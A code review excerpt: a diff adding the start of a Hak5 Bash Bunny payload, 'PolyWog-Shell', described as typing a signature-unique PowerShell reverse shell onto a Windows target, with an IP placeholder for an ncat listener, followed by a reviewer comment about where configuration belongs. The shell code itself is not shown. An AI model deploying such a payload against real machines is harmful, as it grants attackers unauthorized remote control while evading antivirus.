payloads/library/execution/PolyWog-Shell/payload.txt

```diff
@@ -0,0 +1,51 @@
+####################
+# Title: PolyWog-Shell
+# Author: Hak5Peaks
+# Catagory: Exacuation
+# Description: This payload uses a python2 + Bash script to generate a signature unique powershell rev shell that is typed out on the target PC.  
+# Target: Windows
+####################
+
+# PLEASE READ THE CONFIGUATION REQUIRMENTS INSIDE THE GITHUB REPO BEFORE RUNNING SCRIPT. 
+
+ATTACKMODE HID
+LED B # indicate payload started
+
+Q DELAY 1000 #Waiting for PC to recongize bunny. 
+
+#rev shell call back configuation options. 
+IP="192.168.0.0" #Change this to IP on ncat listen
```

Comment:
Configuration options should be at the top of a payload so they are not missed by end user